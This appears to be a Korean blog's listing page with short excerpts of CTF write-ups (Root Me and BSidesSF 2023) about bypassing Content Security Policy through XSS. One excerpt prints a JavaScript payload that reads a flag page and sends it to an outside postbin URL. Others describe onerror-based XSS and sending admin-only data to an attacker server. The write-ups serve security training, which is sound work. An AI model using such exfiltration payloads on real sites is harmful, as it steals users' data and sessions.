CSP3 [Root Me] CSP Bypass - Inline code 1. 개요 XSS, CSP 문제 2. 분석 헤더를 CSP는 다음과 같습니다. img 태그의 src는 풀렸있지만, onerror로 XSS를 실행시킵니다. connect-src 'none'; font-src 'none'; frame-src 'none'; img-src 'self'; manifest-src 'none'; media-src 'none'; object-src 'none'; script-src 'unsafe-inline'; style-src 'self'; worker-src 'none'; frame-ancestors 'none'; block-all-mixed-content; 요 형태를 응용할것이고, postbin을 생성해서, flag를 전송하도록 수정합니다. "https://" 문자열에 필터가 걸.. 2023. 4. 23. [BSidesSF 2023 CTF] web-tutorial-3 1. 개요 XSS, CSP 문제 2. 분석 CSP를 보면, script는 nonce가 일치할때 실행가능하고, https로 제공되어야한다고합니다. 코드를 살펴보면, nonce="corgi" 입니다. 시나리오는 - 다음 JS 코드를 AWS S3 버킷에 올립니다. fetch("/xss-three-flag") .then(r => r.text()) .then(t => fetch("https://www.toptal.com/developers/postbin/1682170081878-4064430973958?flag=" + t)) - payload로 버킷 url을 제공합니다. (none="corgi") 입력 flag를 얻었습니다. 2023. 4. 22. [BSidesSF 2023 CTF] web-tutorial-1 1. 개요 XSS, CSP 문제 2. 분석 admin의 권한으로 /xss-one-flag를 읽고, 그 결과를 제가 만든 서버에 전송하도록 만듭니다. 2023. 4. 22. 이전 1 다음